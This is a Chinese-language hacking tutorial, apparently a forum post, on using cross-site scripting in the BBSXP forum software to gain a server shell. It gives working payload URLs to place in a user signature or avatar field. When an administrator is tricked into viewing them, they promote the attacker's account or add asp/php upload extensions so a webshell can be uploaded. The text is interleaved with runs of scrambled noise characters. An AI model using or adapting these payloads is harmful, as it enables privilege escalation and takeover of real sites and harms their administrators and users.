一、什么是XSS攻击( i3 S+ @6 |; m+ U4 @
0 M( X8 M5 T; X1 a2 {/ b
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是老技术,但是其思路希望对大家有帮助。
& F* I3 K4 V2 K6 ]! i6 [: t7 P5 {- E: A* I# X6 K" ^! \6 s- n7 e7 h0 Y Q6 G2 ^
如何寻找XSS漏洞3 B% E% p5 D0 F$ ~: J
% O7 ]' j: ^# q. R; J 就个人而言,我把XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。另一类则是来来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。
9 C5 j* a6 O! K$ H& ?/ W5 S8 e6 X9 x$ J# m% I7 F# z1 M
然后利用下面的技术得到一个shell.
4 q" W T% q1 O8 Y1 l; c! w
4 C5 Y3 z! C4 N3 O 如何利用 g8 ?- X- S6 _
( _/ @7 }- Y1 |5 V; Y w' m# j2 w
传统的跨站利用方式一般都是攻击者先构造一个跨站网页,然后在另一空间里放一个收集cookie的页面,接着结合其它技术让用户打开跨站页面以盗取用户的cookie,以便进一步的攻击。个人认为这种方式太过于落后,对于弊端大家可能都知道,因为即便你收集到了cookie你也未必能进一步渗透进去,多数的cookie里面的密码都是经过加密的,如果想要cookie欺骗的话,同样也要受到其它的条件的限约。而本文提出的另一种思路,则从一定程度上解决上述的问题。对于个人而言,比较成熟的方法是通过跨站构造一个表单,表单的内容则为利用程序的备份功能或者加管理员等功能得到一个高权限。下面我将详细的介绍这种技术。; j3 [0 l9 @% `3 V
) O0 Z: X" a9 C 二、来自内部的跨站攻击
, {- \- ?+ K3 j! V1 ?$ o6 O$ g% `& d; h5 ?- ^
寻找跨站漏洞9 `( Z6 P6 `( Y O. R. F8 G" i* O
! f2 {7 ~* T+ ~
如果有代码的话比较好办,我们主要看代码里对用户输入的地方和变量有没有做长度和对”<”,”>”,”;”,”’”等字符是否做过滤。还有要注意的是对于标签的闭合,像测试QQ群跨站漏洞的时候,你在标题处输入<script>alert(‘test’)</script>,代码是不会被执行的,因为在源代码里,有其它的标签未闭合,如少了一个</script>,这个时候,你只要闭合一个</script>,代码就会执行,如:你在标题处输入</script><script>alert(‘test’)</script>,这样就可以弹出一个test的框。
0 v; |, z P9 V* z8 h n+ [2 S
$ U+ m; C: w( _' `. ^9 d 如何利用
: Q: ?3 S+ d9 E7 f. F& r
8 P" k" R) L/ A6 t* ^3 w 我先以BBSXP为例,过程已做成动画,详情可见光盘中的动画。我举BBSXP中其中两个比较好用的跨站漏洞点为例.
6 H2 r" O* F/ i3 M' ?; q/ r) H* M3 t. Z3 _. ]7 t: z3 H& j
& P* `) W" h' U+ x
a.先注册一个普通用户,我这里注册的用户是linzi.然后我们在个人签名里写入:; M) x j+ e) E. a Q4 H1 Y+ l
6 g4 x) G. g- V6 p c- h
http://127.0.0.1/bbsxp/admin_user.asp?menu=userok&username=linzi&membercode=5&userlife=1&posttopic=3&money=9&postrevert=0&savemoney=0&deltopic=1®time=2005-9-1+1%3A1%3A1&experience=9&country=%D6%D0%B9%FA&&Submit=+%B8%FC+%D0%C2+ / s6 {: a) |$ H! u# {7 R
6 [+ ]3 b8 k- p, G% d c.然后发个贴子,可以结合其它技术欺骗管理员浏览发的贴子。" @: g! G" N w6 }5 `& t
, v! m2 j& T& `, e; H% M0 s" T
d.因为是测试,所以我们以管理员身份登陆,然后打开贴子,我们会发现,linzi已经变成了社区区长工,如图一所示
8 S: n! [" M! a$ [
# w* h7 F2 P& n d7 U; E 除此之外我们只要在个人签名里输入
b7 f5 \* |8 {
5 v4 u2 O/ X! }- D2 A% Xhttp://127.0.0.1/bbsxp/admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|asp%20|rar
( n E) a2 c6 ]3 L) Q/ n/ i. T3 F. R8 k( D4 O& c
同样发个贴子等,只要管理员打开了,就会加了一个扩展名为asp (有空格)的上传扩展,这个时候,你只要上传一个newmm.asp (有空格)就可以得到一个shell.9 g: o' r. E1 D3 M
8 A, \7 [8 r3 E. R4 e, @8 J
. n# |- e: U& [ u' S
上面的攻击多多少少有点局限性,虽然可以得到shell,但是隐蔽性不太好,因为签名处受到了长度的限制,不能超过255个字符。我们可以结合flash跨站实现更为隐蔽的攻击,对于flash木马的制作,下面见哥们丰初的介绍。% X( t# p2 Y% Y( ^. Y" R/ b
; O) R8 o, p+ H' U- U4 S0 k 再利用如下:
' D& o r' M, z+ k) }% U
~! i, N, b3 @, r, _1 B 修改一下个人头像的url,输入代码如下: admin_setup.asp? : V$ U! E/ M( h* F# ?" E
y7 I! i9 m& i" i5 h+ |, t% R0 o
menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|php|rar ) N2 x1 ], G. L2 ^* i4 m
# h/ c& o. j+ G- L 再接着欺骗管理员打开你的资料或者浏览你的贴子,当管理员打开后,会在后台自动加个php扩展名的后辍,因为bbsxp在个人头像url里过滤了空格,%,所以我们只能加个不包括空格的其它扩展,当然你也可以加个shtml的扩展,有了它你就可以用来查看源代码,然后进一步攻击。& H% L% \' u% l2 y6 n9 C
|